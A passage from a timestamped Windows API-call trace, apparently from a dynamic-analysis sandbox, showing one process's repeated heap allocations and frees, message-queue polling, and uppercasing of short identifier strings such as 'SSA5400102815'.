(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0190.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0190.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0190.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0190.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0190.603] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0190.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0190.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0190.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0190.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0190.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0190.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0190.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0190.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.605] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0190.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0190.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0190.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0190.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0190.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0190.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0190.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0190.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0190.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0190.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0190.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.605] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.605] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.605] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0190.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0190.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0190.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0190.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0190.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0190.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0190.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0190.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0190.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0190.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.606] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0190.606] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.606] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0190.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0190.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0190.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0190.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0190.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0190.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0190.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.607] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0190.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0190.607] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0190.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0190.607] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ed0 [0190.607] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.607] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.608] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0190.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0190.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0190.608] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.608] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.608] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.608] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0190.609] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0190.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0190.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0190.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0190.609] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0190.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.609] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0190.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0190.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.609] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.609] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0190.610] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.610] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0190.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0190.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0190.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0190.610] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0190.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.610] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0190.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0190.611] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.611] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0190.611] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0190.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0190.611] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0190.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0190.611] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.611] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0190.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0190.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0190.612] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0190.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0190.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0190.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0190.612] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.612] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0190.612] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.612] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0190.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0190.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0190.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0190.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0190.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.613] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0190.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0190.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.613] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0190.613] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.613] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.613] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, 